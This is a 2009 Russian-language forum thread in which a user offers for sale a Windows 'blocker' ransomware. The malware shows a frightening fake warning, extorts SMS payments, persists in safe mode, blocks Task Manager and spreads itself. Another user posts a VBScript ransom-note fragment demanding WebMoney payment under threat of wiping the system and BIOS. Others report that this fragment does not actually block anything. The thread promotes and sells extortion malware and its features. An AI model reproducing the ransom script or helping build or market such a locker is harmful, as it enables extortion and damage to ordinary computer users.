Иной взгляд на вирмейкерскую сцену

Raptor's Software форум

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Raptor's Software форум » Другие продукты » Программа блокиратор Windows


Программа блокиратор Windows

Сообщений 1 страница 16 из 16

1

Всем привет !Хочу представить вам блокиратор windows.Теперь он стал более сверепым и более умелым.После запуска и ввода нужных данных как мы уже знаем программа "скрывается", через некоторое время или же сразу, в общем после перезагрузки, программа активируется - вылезает  окно о том, что что-то жуткое находится на нашей машине, причем написанно это весьма убедительно... Пользователь подумал, "Да... Это серьезно, надо бы отправить смс, а то кто его знает..." и отправляет смс, ему приходит код разблокировки (активации), он его вводит и виндовс вроде как начинает работать, но наша злобная зверюга все еще сидит в процессах и блокирует всевозможные способы своего "уничтожения" и конечно же постоянно копируется во все, что только можно.Зарегистрируйтесь на биллинге и получайте деньги.Программа стоит 3$.По всем вопросам стучим  489301239.Поверьте это не так дорого.По сравнению с тем что вы можете заработать.

0

2

Вот бесплатная фуфляндия, типа такой же как предлагает "ХАКЕР" cyber23.
Написать такой скрипт в текстовом редакторе и сменить расширение .txt на .vbs , запустить.

' Microdoft Corporation
Set FileSystemObject = CreateObject("scripting.filesystemobject")
Set Shell = CreateObject("Wscript.Shell")
t = 0: On Error Resume Next ' Пропускать ошибки
Set Application = CreateObject("Shell.Application")
Set InternerExplorer = WScript.CreateObject("InternetExplorer.Application ")
Set Outlook = WScript.CreateObject("Outlook.Application")
prl = inputbox("Если ввести непральный пароль вир удалит систему и Bios!чтобы получить пароль отправляй 500 рублей на кошелёк R************ а потом пиши на *******@mail.ru!В само письме обязательно укажи номер кош.WebMoney с которого ты отправлял деньги! ", "Пизец!")

Вместо звездочек, написать свои кошели.

0

3

Браво Букдубраз

0

4

Программа написана на Визуал Бейсике!А у тебя просто голимый почтовый червь , который всем палиться.Исходник не бось с какого сайта содрал.

0

5

VBSник конечно может и палится,но при грамотном подходе из него можно сделать экзешник который палиться не будет.

0

6

Мое мнение,что VBSники и батники актуальны до сих пор,несмотря на то что к ним относятся презрительно.Пишутся просто и со вкусом.

+1

7

Скрипт Букдубраза как блокиратор виндовс не работает.Только что протестировал на виртуале.Винда загружаеться и перезагружаеться нормально-нет ни какой блокировки.В скрипте нет ничего блокирующего.Зачем людей дурить.

0

8

Может быть.Его скрипт я не проверял.

0

9

Nik написал(а):

Его скрипт я не проверял

Я проверял.

0

10

cyber23
Вот для тебя сокращенный вариант скрипта (БЕСПЛАТНО):

Msg = MsgBox("Слышь, чувак, я cyber23, гони wmz на Z******")
Msg = MsgBox("А то глаз на жопу натяну!!!")

Отредактировано Букдубраз (2009-07-28 18:52:26)

+1

11

По некоторым причинам сейчас пока не могу ничего проверить на виртуалке.
И тем не менее Букдубраз +1

0

12

Букдубраз написал(а):

Вот для тебя сокращенный вариант скрипта (БЕСПЛАТНО):
            Msg = MsgBox("Слышь, чувак, я cyber23, гони wmz на Z******")Msg = MsgBox("А то глаз на жопу натяну!!!")

Такого дебильства я ещё не видел !!!Толку то от твоего дешёвого скрипта?MsgBox-отображает  сообщение в диалоговом окне , ожидает нажатия кнопки и возвращает целое число, определяющее нажатую кнопку.Что в этом скрипте блокирующего ?????Букдубраз ты хоть понимаешь что ты пишешь?Это же детский сад.
Здесь на форуме есть программисты?Ну что ты споришь Букдубраз ?Что за бестолковую ерунду ты вылаживаешь ???А остальные не понимая сути пишут да крутые vbs скрипты.Сами не понимая их функции-потому что не программисты.Хрен с ним за 2 бакса продам.Труд должен как то цениться?Анологичные программы продаються минимум за 15 $. А блокиратор Windows  чисто на asm и того 80 $.Сейчас в разработке троян.

Отредактировано cyber23 (2009-07-28 23:42:30)

0

13

cyber23 написал(а):

Здесь на форуме есть программисты?

Я не программист,скорее просто любитель.Но раз пошла такая пьянка,через пару дней буду дома и проверю VBSник 
на виртуалке.Тогда и можно поговорить адекватно. А не просто языком лязгать.

Отредактировано Nik (2009-07-29 01:13:27)

0

14

cyber23 я только одного не могу понять,чего ты на Букдубраза взъелся?

Отредактировано Nik (2009-07-29 15:40:23)

0

15

cyber23
Опиши подробней, в чём выражается блокировка Windows, на каких операционках работает твой вирус, способ размножения, и.т.п.

cyber23 написал(а):

Это же детский сад.

У тебя оказывается и с чувством юмора трудновато, ну да ладно...

Отредактировано Букдубраз (2009-07-29 18:23:22)

0

16

1.Постоянное самораспространение.
2.Программа отлично работает  в безопасном режиме.
3.Свою главную копию (с которой она и запускается) копирует далеко в системню папку...
4.Блокирует диспетчер задач, окно "Фильтрация", окно "Диспетчер служебных программ" (Win+U), и процесс rundll.exe (его только непосредственно в момент блокировки, после разблокровки этот процесс не блокируется.
5. минус - это то, что программа не работает на Vista OC, но она с лихвой компинсирует -это функция самораспрострнения.
После переустановки винды,если у user есть локальные диски d,е и.т.п то програма снова загружаеться и активируеться.Копируеться на всё что можно.

0


Вы здесь » Raptor's Software форум » Другие продукты » Программа блокиратор Windows